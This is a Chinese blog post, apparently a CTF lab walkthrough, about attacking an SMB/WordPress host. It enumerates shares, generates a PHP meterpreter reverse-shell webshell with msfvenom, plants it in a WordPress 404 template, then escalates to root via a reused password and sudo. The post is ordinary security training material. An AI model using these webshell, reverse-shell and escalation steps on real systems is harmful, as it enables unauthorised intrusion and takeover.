SMB协议

最新推荐文章于 2024-06-05 18:01:21 发布
最新推荐文章于 2024-06-05 18:01:21 发布
阅读量7.5k 收藏 15
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42434336/article/details/101204404
版权

SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。

Port 139 (TCP) - 文件和打印共享 ; smbd (基于SMB(Server Message Port 445 (TCP) - NetBIOS服务在windos 2000及以后版本使用此端口, (Common Internet File System,CIFS,它是SMB协议扩展到Internet后,实现Internet文件共享)Block)协议,主要在局域网中使用,文件共享协议)

 

139和445都是smb协议

3306开发mysql服务

1针对smb协议,使用空口令

smbclient -L ip

smbclient '\\ip\$share'

ipc是空文件,print无权限访问

get 敏感文件

gedit是一个Linux环境下的文本编辑器,类似windows下的写字板程序,在不需要特别复杂的编程环境下,作为基本的文本编辑器比较合适。

3306端口开放mysql服务

不允许远程登陆mysql

那就通过ssh协议进入主机再登陆

2针对smb协议远程溢出漏洞进行分析

searchsploit samba版本号

nmap -A -v -T4 192.168.1.108

搜出samba版本号

针对http协议弱点分析

浏览器查看网站,使用dirb,nikto探测,寻找突破点,目标登陆后台,上传webshell

dirb http://192.168.1.108
==> DIRECTORY: http://192.168.1.108/wordpress/wp-admin/   

登陆到后台

制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机Ip Iport=4444 -f raw >/root/Destktop/shell.php

利用msfvenom制作 .exe 文件,然后发送到靶机Windows上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机

msfconsole

å¨è¿éæå¥å¾çæè¿°

å¨è¿éæå¥å¾çæè¿°

输入run之后去打开web网页点击Appearance》》Editor》》404 Template

把shell.php文件里的代码复制到404里去点击上传成功后会显示出来
然后通过固定路径http://靶场IP/wordpress/wp-content/themes/twentyfifteen/404.php访问webshell
 

å¨è¿éæå¥å¾çæè¿°

å¨è¿éæå¥å¾çæè¿°

然后输入id反弹回shell
接下来还是同样的,优化终端(python -c “import pty;pty.spawn(’/bin/bash’)”)

使用cat /etc/passwd/查看当前系统的其他用户名(注意home目录下)发现个togie用户,su togie去切换到togie目录,密码用之前发现的12345登录成功。

还是要去切换到root权限,用sudo -l查看su能执行哪些操作,然后用sudo su来提升权限

最后在root找到proof.txt。

^BonnenuIt
关注
  • 1
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux:samba服务 (smbd)
鲍海超
06-08 2万+
samba 使用了1.SMB 协议Server Message Block,服务消息块2.CIFS 协议Common Internet File System,通用互联网文件系samba有两项主程序分别是smbd和nmbd。这两个守护进程在服务器启动到停止期间持续运行,功能各异。Smbd和nmbd使用的全部配置信息全都保存在smb.conf文件中。Smb.conf向smbd和nmbd两个守护进程说明输出什么以便共享,共享输出给谁及如何进行输出。Samba提供了基于CIFS的四个服务。
【Shell 命令集合 网络通讯 】Linux 提供SMB共享 smbd命令 使用指南
探索C++编程的奥秘,分享深入的技术见解和实践,旨在激发读者创造力与解决问题的思维。
06-27 2681
smbd命令是Linux操作系统中的一个服务程序,用于提供SMB(Server Message Block)协议的文件和打印机共享功能。SMB协议是一种网络文件共享协议,允许不同操作系统之间共享文件和打印机。
SMB协议简介
最新发布
sunjiaoya的博客
06-05 979
在了解永恒之蓝前需要先要知道什么是SMB,以及SMB连接过程发生了什么事情。 SMB( Server Message Block ),服务消息块,是 IBM 公司在 80 年代中期发明的一种文件共享协议,电脑上的网上邻居就是靠它实现的 。它只是系统之间通信的一种方式(协议),并不是一款特殊的软件。
Linux smbd命令教程:如何配置和管理Samba服务器(附案例详解和注意事项)
u012964600的博客
12-02 4545
smbd是Samba套件的一部分。smbd是一个服务器守护进程,为Windows客户端提供文件共享和打印服务。服务器使用SMB(或CIFS)协议为客户端提供文件空间和打印服务。这与LanManager协议兼容,可以为LanManager客户端提供服务。
Linux 网络通讯 : smbd 命令详解
yexiangCSDN的专栏
12-18 8293
Linux smbd命令用于Samba服务器程序。 smbd为Samba服务器程序,可分享文件与打印机等网络资源供Windows相关的用户端程序存取。 语法 1 smbd [-aDhoP][-d<排错层级>][-i<范围>][-l<记录文件>][-O<连接槽选项>][-p<连接端口编号>][-s<...
samba相关概念
John Wayne的专栏
06-18 1万+
一、 客户命令: 1. smbclient smbclient 命令用来存取远程 samba 服务器上的资源,它的界面到目前为止还是文本方式的,命令形式和 ftp 类似。 smbclient 命令的语法是: smbclient [password] [options] 其中 servicename 是要连接的资源名称,资源名称的形式如下: //server/service 其中
smb协议Android jar包
01-10
Android设备虽然主要使用的是Linux内核,但通过特定的库和API,也可以实现对SMB协议的支持,从而能够访问Windows系统上的共享文件夹。在这个"Android jar包"中,很可能是包含了一个或多个Java库,这些库使得Android...
SMB协议介绍
10-12
SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用...
CIFS协议 SMB协议
06-28
CIFS是公共的或开放的SMB协议版本,并由Microsoft使用。SMB协议现在是局域网上用于服务器文件访问和打印的协议。象SMB协议一样,CIFS在高层运行,而不象TCP/IP协议那样运行在底层。CIFS可以看做是应用程序协议如文件...
利用smb协议读取远程文件
04-25
SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用...
smb协议访问带用户名密码的共享文件夹
05-28
smb协议访问带用户名密码的共享文件夹,是一个完全用Java开发的SMB客户端库。它紧密地遵循CIFS规范(是Microsoft Windows平台标准文件共享协议),支持Unicode,命令管道,批处理,线程化调用者的IO复用,加密认证,...
Linux smbd命令教程:samba服务器配置和管理利器(附案例详解和注意事项)
u012964600的博客
01-26 3437
smbd,全称Samba Server Daemon,是samba套件的一部分,本质上是一个服务器守护进程。主要用于为Windows客户端提供文件共享和打印服务。它使得Linux和Windows等不同操作系统之间可以互相访问文件和打印机等,广泛应用于局域网内的文件以及打印机共享。
什么是SMB端口和端口号? 哪个协议使用端口445和端口139
热门推荐
cunjiu9486的博客
10-07 7万+
Server Message Blocks name shortcut SMB . SMB is a protocol used by Windows Operating systems. SMB provides a lot of windows operating system related services over the network. SMB mainly used for fil...
smbd的安装与使用
weixin_44275401的博客
07-15 7985
文件共享服务软件 samba 安装与配置 安装了samba服务的主机,可以将文件共享给其它用户,其它用户可以对文件进行读写操作。 安装 以Ubuntu Linux为例 1、 安装 2、 检查是否安装成功 启动 samba服务: 查看samba服务状态: 3、 添加用户 添加的用户名为 登录系统时用的普通用户,此处设置的密码为 123456abc (测试环境,密码可以设置简单一些) 4、 修改配置文件,设置共享目录 编辑配置文件 /etc/samba/smbd.conf(修改前先备份此文件),添
linux下smbd服务,Linux下资源共享服务之samba 的讲解!
weixin_42390525的博客
05-08 3802
一、Samba 简介:Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。samba是一个工具套件,在Unix上实现SMB(Server Message Block)协议,或者称之为NETBIOS/LanManager协议SMB协议通常是被windows系列用来实现磁盘和打印机共享。需要注意的是,NetBIOS是基于以太网广播机制的,没有透明网桥是不能...
smbd映射
qq_40403979的博客
12-08 544
smbd映射服务器配置简介
samba文件共享
Sonboy的博客
09-04 475
samba文件夹共享
smbd和nmbd
blankpro的专栏
11-24 3万+
//感激:http://hi.baidu.com/afantihome/blog/item/7688db649be412f7f636547c.html Samba由两个主要程序组成,它们是smbd和nmbd。这两个守护进程在服务器启动到停止期间持续运 行,功能各异。Smbd和nmbd使用的全部配置信息全都保存在smb.conf文件中。Smb.conf向smbd和nmbd两个守护进程说明输出什么
python 的 smb协议
05-29
Python提供了多种方法来访问SMB(Server Message Block)协议的网络共享文件夹,包括: 1. 使用Python的`smbclient`模块:这是一个Python库...此外,SMB协议的版本和配置也可能会影响访问,需要根据具体情况进行设置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值